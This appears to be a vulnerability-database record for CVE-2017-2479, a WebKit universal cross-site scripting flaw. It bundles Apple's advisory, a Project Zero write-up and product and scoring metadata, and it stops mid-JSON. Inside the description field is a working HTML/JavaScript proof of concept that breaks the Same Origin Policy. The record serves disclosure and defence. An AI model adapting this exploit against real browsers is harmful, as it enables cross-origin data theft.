var-201704-0802
Vulnerability from variot
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. iCloud before 6.2 on Windows is affected. iTunes before 12.6 on Windows is affected. tvOS before 10.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site. WebKit is prone to multiple information-disclosure and memory-corruption vulnerabilities. Failed exploit attempts will likely cause a denial-of-service condition.
Apple iOS, iCloud for Windows, iTunes for Windows, Safari, and tvOS are all products of the American company Apple. Apple iOS is an operating system developed for mobile devices; Safari is a web browser that ships by default with the Mac OS X and iOS operating systems. WebKit is an open source web browser engine developed by the KDE community and is currently used by browsers such as Apple Safari and Google Chrome.
APPLE-SA-2017-03-28-2 Additional information for APPLE-SA-2017-03-22-1 iTunes for Windows 12.6
iTunes for Windows 12.6 addresses the following:
APNs Server
Available for: Windows 7 and later
Impact: An attacker in a privileged network position can track a user's activity
Description: A client certificate was sent in plaintext. This issue was addressed through improved certificate handling.
CVE-2017-2383: Matthias Wachs and Quirin Scheitle of Technical University Munich (TUM)
Entry added March 28, 2017

iTunes
Available for: Windows 7 and later
Impact: Multiple issues in SQLite
Description: Multiple issues existed in SQLite. These issues were addressed by updating SQLite to version 3.15.2.
CVE-2013-7443
CVE-2015-3414
CVE-2015-3415
CVE-2015-3416
CVE-2015-3717
CVE-2015-6607
CVE-2016-6153

iTunes
Available for: Windows 7 and later
Impact: Multiple issues in expat
Description: Multiple issues existed in expat. These issues were addressed by updating expat to version 2.2.0.
CVE-2009-3270
CVE-2009-3560
CVE-2009-3720
CVE-2012-1147
CVE-2012-1148
CVE-2012-6702
CVE-2015-1283
CVE-2016-0718
CVE-2016-4472
CVE-2016-5300

libxslt
Available for: Windows 7 and later
Impact: Multiple vulnerabilities in libxslt
Description: Multiple memory corruption issues were addressed through improved memory handling.
CVE-2017-5029: Holger Fuhrmannek
Entry added March 28, 2017

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: Multiple memory corruption issues were addressed through improved memory handling.
CVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative
Entry added March 28, 2017

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may exfiltrate data cross-origin
Description: A validation issue existed in element handling. This issue was addressed through improved validation.
CVE-2017-2479: lokihardt of Google Project Zero
CVE-2017-2480: lokihardt of Google Project Zero
Entry added March 28, 2017

Installation note:
iTunes for Windows 12.6 may be obtained from: https://www.apple.com/itunes/download/
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
WebKit: UXSS via a focus event and a link element
CVE-2017-2479
This is somewhat similar to https://crbug.com/663476.
Here's a snippet of Container::replaceAllChildren.
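    while (RefPtr<Node> child = m_firstChild) {
        removeBetween(nullptr, child->nextSibling(), *child);
        notifyChildNodeRemoved(*this, *child);
    }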
If the location hash value is set, the page will give focus to the associated element. However, if there is a stylesheet that has not been loaded yet, the focusing will be delayed until the stylesheet gets loaded. The problem is that when the link element linked to the last pending stylesheet is removed from the parent, the notifyChildNodeRemoved function may end up firing a focus event which runs arbitrary JavaScript code, which can make an iframe (|g| in the PoC) that has an attached frame but has no parent.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
Found by: lokihardt
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201704-0802", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "iphone os", "scope": "lt", "trust": 1.0, "vendor": "apple", "version": "10.3" }, { "model": "icloud", "scope": "lt", "trust": 1.0, "vendor": "apple", "version": "6.2" }, { "model": "tvos", "scope": "lt", "trust": 1.0, "vendor": "apple", "version": "10.2" }, 
{ "model": "itunes", "scope": "lt", "trust": 1.0, "vendor": "apple", "version": "12.6" }, { "model": "safari", "scope": "lt", "trust": 1.0, "vendor": "apple", "version": "10.1" }, { "model": "icloud", "scope": "eq", "trust": 0.9, "vendor": "apple", "version": "6.1.1" }, { "model": "icloud", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "6.2 (windows 7 or later )" }, { "model": "ios", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "10.3 (ipad first 4 after generation )" }, { "model": "ios", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "10.3 (iphone 5 or later )" }, { "model": "ios", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "10.3 (ipod touch first 6 after generation )" }, { "model": "itunes", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "for windows 12.6 (windows 7 or later )" }, { "model": "safari", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "10.1 (macos sierra 10.12.4)" }, { "model": "safari", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "10.1 (os x el capitan v10.11.6)" }, { "model": "safari", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "10.1 (os x yosemite v10.10.5)" }, { "model": "tvos", "scope": "lt", "trust": 0.8, "vendor": "apple", "version": "10.2 (apple tv first 4 generation )" }, { "model": "tv", "scope": "eq", "trust": 0.6, "vendor": "apple", "version": "10.1.1" }, { "model": "iphone os", "scope": "eq", "trust": 0.6, "vendor": "apple", "version": "10.2.1" }, { "model": "itunes", "scope": "eq", "trust": 0.6, "vendor": "apple", "version": "12.5.5.5" }, { "model": "safari", "scope": "eq", "trust": 0.6, "vendor": "apple", "version": "10.0.3" }, { "model": "open source project webkit", "scope": "eq", "trust": 0.3, "vendor": "webkit", "version": "0" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.5.5" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.5.1" }, { "model": 
"itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.4.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.3.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.3.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.2.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.1.5" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.1.4" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.1.3" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.1.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.1.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.0.5" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.0.4" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.0.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.6.3" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.6.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.5.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.1.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.5.4" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.5.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.4" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.3" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "12.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": 
"12.0.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.0.3" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.0.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "11.0" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.7" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.6" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.5.3" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.5.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.5" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.4.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.4" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.3.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.3" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.2.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.2" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.1.1.4" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.1.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.0.1" }, { "model": "itunes", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10" }, { "model": "icloud", "scope": "eq", "trust": 0.3, "vendor": "apple", 
"version": "6.1" }, { "model": "icloud", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0.1" }, { "model": "icloud", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0" }, { "model": "itunes", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "12.6" }, { "model": "icloud", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "6.2" } ], "sources": [ { "db": "BID", "id": "97176" }, { "db": "JVNDB", "id": "JVNDB-2017-002431" }, { "db": "CNNVD", "id": "CNNVD-201703-1342" }, { "db": "NVD", "id": "CVE-2017-2479" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:apple:icloud", "vulnerable": true }, { "cpe22Uri": "cpe:/o:apple:iphone_os", "vulnerable": true }, { "cpe22Uri": "cpe:/a:apple:itunes", "vulnerable": true }, { "cpe22Uri": "cpe:/a:apple:safari", "vulnerable": true }, { "cpe22Uri": "cpe:/o:apple:apple_tv", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-002431" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Kai Kang (4B5F5F4B) of Tencent\u0027s Xuanwu Lab and lokihardt of Google Project Zero", "sources": [ { "db": "BID", "id": "97176" }, { "db": "CNNVD", "id": "CNNVD-201703-1342" } ], "trust": 0.9 }, "cve": "CVE-2017-2479", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": 
"https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2017-2479", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.9, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-110682", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "id": "CVE-2017-2479", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-2479", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2017-2479", "trust": 0.8, "value": "Medium" }, { "author": "CNNVD", "id": "CNNVD-201703-1342", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-110682", "trust": 0.1, "value": "MEDIUM" }, { "author": 
"VULMON", "id": "CVE-2017-2479", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-110682" }, { "db": "VULMON", "id": "CVE-2017-2479" }, { "db": "JVNDB", "id": "JVNDB-2017-002431" }, { "db": "CNNVD", "id": "CNNVD-201703-1342" }, { "db": "NVD", "id": "CVE-2017-2479" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. iCloud before 6.2 on Windows is affected. iTunes before 12.6 on Windows is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site. WebKit is prone to multiple information-disclosure and memory-corruption vulnerabilities. Failed exploit attempts will likely cause a denial-of-service condition. Apple iOS, iCloud for Windows, iTunes for Windows, Safari, and tvOS are all products of the American company Apple (Apple). Apple iOS is an operating system developed for mobile devices; Safari is a web browser that comes with the Mac OS X and iOS operating systems by default. WebKit is an open source web browser engine developed by the KDE community and is currently used by browsers such as Apple Safari and Google Chrome. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2017-03-28-2 Additional information for\nAPPLE-SA-2017-03-22-1 iTunes for Windows 12.6\n\niTunes for Windows 12.6 addresses the following:\n\nAPNs Server\nAvailable for: Windows 7 and later\nImpact: An attacker in a privileged network position can track a\nuser\u0027s activity\nDescription: A client certificate was sent in plaintext. This issue\nwas addressed through improved certificate handling. 
\nCVE-2017-2383: Matthias Wachs and Quirin Scheitle of Technical\nUniversity Munich (TUM)\nEntry added March 28, 2017\n\niTunes\nAvailable for: Windows 7 and later\nImpact: Multiple issues in SQLite\nDescription: Multiple issues existed in SQLite. These issues were\naddressed by updating SQLite to version 3.15.2. \nCVE-2013-7443\nCVE-2015-3414\nCVE-2015-3415\nCVE-2015-3416\nCVE-2015-3717\nCVE-2015-6607\nCVE-2016-6153\n\niTunes\nAvailable for: Windows 7 and later\nImpact: Multiple issues in expat\nDescription: Multiple issues existed in expat. These issues were\naddressed by updating expat to version 2.2.0. \nCVE-2009-3270\nCVE-2009-3560\nCVE-2009-3720\nCVE-2012-1147\nCVE-2012-1148\nCVE-2012-6702\nCVE-2015-1283\nCVE-2016-0718\nCVE-2016-4472\nCVE-2016-5300\n\nlibxslt\nAvailable for: Windows 7 and later\nImpact: Multiple vulnerabilities in libxslt\nDescription: Multiple memory corruption issues were addressed through\nimproved memory handling. \nCVE-2017-5029: Holger Fuhrmannek\nEntry added March 28, 2017\n\nWebKit\nAvailable for: Windows 7 and later\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues were addressed through\nimproved memory handling. \nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent\u0027s Xuanwu Lab\n(tencent.com) working with Trend Micro\u0027s Zero Day Initiative\nEntry added March 28, 2017\n\nWebKit\nAvailable for: Windows 7 and later\nImpact: Processing maliciously crafted web content may exfiltrate\ndata cross-origin\nDescription: A validation issue existed in element handling. This\nissue was addressed through improved validation. 
\nCVE-2017-2479: lokihardt of Google Project Zero\nCVE-2017-2480: lokihardt of Google Project Zero\nEntry added March 28, 2017\n\nInstallation note:\n\niTunes for Windows 12.6 may be obtained from:\nhttps://www.apple.com/itunes/download/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBCgAGBQJY2sl6AAoJEIOj74w0bLRGEMAQAJjPU9+iTIEs0o4EfazvmkXj\n/zLRgzdfr1kp9Iu90U/ZxgnAO3ZUqEF/6FWy6dN3zSA7AlP7q+zFlxXqbkoJB+eX\nsE+vGilHWZ8p2Qud9EikwDKCvLNn/4xYQ9Nm0jCwA14VBS1dBlOrFUlsnM9EoS9/\nYKks/NSYV9jtLgKvc42SeTks62tLL5ZQGMKv+Gg0HH2Yeug2eAHGb+u5vYCHTcER\nAMTKKQtr57IJyz2tg7YZGWvbKIS2690CpIyZGxpbUCKv+dNdEPsDTNHjjpzwMBtc\ndiSIIX8AC6T0nWbrOFtWqhhFyWk6rZAWb8RvDYYd/a6ro7hxYq8xZATBS2BJFskp\nesMHBuFYgDwIeJiGaCW07UyJzyzDck7pesJeq7gqF+O5Fl6bdHN4b8rNmVtBvDom\ng7tkwSE9+ZmiPUMJGF2NUWNb4+yY0OPm3Uq2kvoyXl5KGmEaFMoDnPzKIdPmE+b+\nlJZUYgQSXlO6B7uz+MBx2ntH1uhIrAdKhFiePYj/lujNB3lTij5zpCOLyivdEXZw\niJHX211+FpS8VV1/dHOjgbYnvnw4wofbPN63dkYvwgwwWy7VISThXQuMqtDW/wOE\n9h0me2NkZRxQ845p4MaLPqZQFi1WcU4/PbcBBb0CvBwlnonYP/YRnyQrNWx+36Fo\nVkUmhXDNi0csm+QTi7ZP\n=hPjT\n-----END PGP SIGNATURE-----\n\n\n\n. WebKit: UXSS via a focus event and a link element \n\nCVE-2017-2479\n\n\nThis is somewhat similar to \u003ca href=\"https://crbug.com/663476\" title=\"\" class=\"\" rel=\"nofollow\"\u003ehttps://crbug.com/663476\u003c/a\u003e. \n\nHere\u0027s a snippet of Container::replaceAllChildren. \n\nwhile (RefPtr\u003cNode\u003e child = m_firstChild) {\n removeBetween(nullptr, child-\u003enextSibling(), *child);\n notifyChildNodeRemoved(*this, *child);\n}\n\nIf the location hash value is set, the page will give focus to the associated element. 
However, if there is a stylesheet that has not been loaded yet, the focusing will be delayed until the stylesheet gets loaded. The problem is that when the link element linked to the last pending stylesheet is removed from the parent, the notifyChildNodeRemoved function may end up to fire a focus event which runs arbitrary JavaScript code, which can make an iframe(|g| in the PoC) that has an attached frame but has no parent. \n\n\u003chtml\u003e\n\u003chead\u003e\n\u003c/head\u003e\n\u003cbody\u003e\n\u003cscript\u003e\n\nlet f = document.body.appendChild(document.createElement(\u0027iframe\u0027));\nlet inp = f.contentDocument.head.appendChild(document.createElement(\u0027input\u0027));\nlet link = inp.appendChild(document.createElement(\u0027link\u0027));\nlink.rel = \u0027stylesheet\u0027;\nlink.href = \u0027data:,aaaaazxczxczzxzcz\u0027;\n\nlet btn = f.contentDocument.body.appendChild(document.createElement(\u0027button\u0027));\nbtn.id = \u0027btn\u0027;\nbtn.onfocus = () =\u003e {\n btn.onfocus = null;\n\n window.g = inp.appendChild(document.createElement(\u0027iframe\u0027));\n window.g.onload = () =\u003e {\n window.g.onload = null;\n\n window.g.src = \u0027javascript:alert(location)\u0027;\n let xml = `\n\u003csvg xmlns=\"\u003ca href=\"http://www.w3.org/2000/svg\" title=\"\" class=\"\" rel=\"nofollow\"\u003ehttp://www.w3.org/2000/svg\u003c/a\u003e\"\u003e\n\u003cscript\u003e\ndocument.documentElement.appendChild(parent.g);\n\n\u003c/sc` + `ript\u003e\n\u003celement a=\"1\" a=\"2\" /\u003e\n\u003c/svg\u003e`;\n\n let h = document.body.appendChild(document.createElement(\u0027iframe\u0027));\n h.src = URL.createObjectURL(new Blob([xml], {type: \u0027text/xml\u0027}));\n };\n\n window.g.src = \u0027\u003ca href=\"https://abc.xyz/\u0027;\" title=\"\" class=\"\" rel=\"nofollow\"\u003ehttps://abc.xyz/\u0027;\u003c/a\u003e\n};\n\nf.contentWindow.location.hash = \u0027btn\u0027;\ninp.textContent = 
\u0027\u0027;\n\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\nThis bug is subject to a 90 day disclosure deadline. If 90 days elapse\nwithout a broadly available patch, then the bug report will automatically\nbecome visible to the public. \n\n\n\n\nFound by: lokihardt\n\n", "sources": [ { "db": "NVD", "id": "CVE-2017-2479" }, { "db": "JVNDB", "id": "JVNDB-2017-002431" }, { "db": "BID", "id": "97176" }, { "db": "VULHUB", "id": "VHN-110682" }, { "db": "VULMON", "id": "CVE-2017-2479" }, { "db": "PACKETSTORM", "id": "141936" }, { "db": "PACKETSTORM", "id": "141937" }, { "db": "PACKETSTORM", "id": "141979" } ], "trust": 2.34 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-110682", "trust": 0.1, "type": "unknown" }, { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=41866", "trust": 0.1, "type": "exploit" } ], "sources": [ { "db": "VULHUB", "id": "VHN-110682" }, { "db": "VULMON", "id": "CVE-2017-2479" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2017-2479", "trust": 3.2 }, { "db": "BID", "id": "97176", "trust": 2.1 }, { "db": "EXPLOIT-DB", "id": "41866", "trust": 1.8 }, { "db": "SECTRACK", "id": "1038157", "trust": 1.8 }, { "db": "JVN", "id": "JVNVU90482935", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2017-002431", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201703-1342", "trust": 0.7 }, { "db": "PACKETSTORM", "id": "141979", "trust": 0.2 }, { "db": "SEEBUG", "id": "SSVID-92922", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-110682", "trust": 0.1 }, 
{ "db": "VULMON", "id": "CVE-2017-2479", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "141936", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "141937", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-110682" }, { "db": "VULMON", "id": "CVE-2017-2479" }, { "db": "BID", "id": "97176" }, { "db": "JVNDB", "id": "JVNDB-2017-002431" }, { "db": "PACKETSTORM", "id": "141936" }, { "db": "PACKETSTORM", "id": "141937" }, { "db": "PACKETSTORM", "id": "141979" }, { "db": "CNNVD", "id": "CNNVD-201703-1342" }, { "db": "NVD", "id": "CVE-2017-2479" } ] }, "id": "VAR-201704-0802", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-110682" } ], "trust": 0.01 }, "last_update_date": "2024-11-23T20:58:22.926000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Apple security updates", "trust": 0.8, "url": "https://support.apple.com/en-us/HT201222" }, { "title": "HT207601", "trust": 0.8, "url": "https://support.apple.com/en-us/HT207601" }, { "title": "HT207607", "trust": 0.8, "url": "https://support.apple.com/en-us/HT207607" }, { "title": "HT207617", "trust": 0.8, "url": "https://support.apple.com/en-us/HT207617" }, { "title": "HT207599", "trust": 0.8, "url": "https://support.apple.com/en-us/HT207599" }, { "title": "HT207600", "trust": 0.8, "url": "https://support.apple.com/en-us/HT207600" }, { "title": "HT207599", "trust": 0.8, "url": "https://support.apple.com/ja-jp/HT207599" }, { "title": "HT207600", "trust": 0.8, "url": "https://support.apple.com/ja-jp/HT207600" }, { "title": "HT207601", "trust": 0.8, "url": "https://support.apple.com/ja-jp/HT207601" }, { "title": "HT207607", "trust": 0.8, "url": 
"https://support.apple.com/ja-jp/HT207607" }, { "title": "HT207617", "trust": 0.8, "url": "https://support.apple.com/ja-jp/HT207617" }, { "title": "Multiple Apple product WebKit Fixes for component security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=68869" }, { "title": "Apple: iCloud for Windows 6.2", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=ec0dbe9c3dba8c45d36ab3d8d8948ccf" }, { "title": "Apple: iTunes 12.6 for Windows", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=a2320462745411a5547ed48fe868a9a6" }, { "title": "Apple: Safari 10.1", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=5c4ba20f7a3a0bac6dc3db074ec0daa4" }, { "title": "Apple: tvOS 10.2", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=96152d4695ab80cff7cf110b4458ab10" }, { "title": "Apple: iOS 10.3", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=e3eec66a6152b7f2dac0fe21bb8ee9cd" }, { "title": "uxss-db", "trust": 0.1, "url": "https://github.com/Metnew/uxss-db " }, { "title": "uxss-db", "trust": 0.1, "url": "https://github.com/0xR0/uxss-db " }, { "title": "Exp101tsArchiv30thers", "trust": 0.1, "url": "https://github.com/nu11secur1ty/Exp101tsArchiv30thers " }, { "title": "awesome-cve-poc_qazbnm456", "trust": 0.1, "url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 " } ], "sources": [ { "db": "VULMON", "id": "CVE-2017-2479" }, { "db": "JVNDB", "id": "JVNDB-2017-002431" }, { "db": "CNNVD", "id": "CNNVD-201703-1342" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-20", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", 
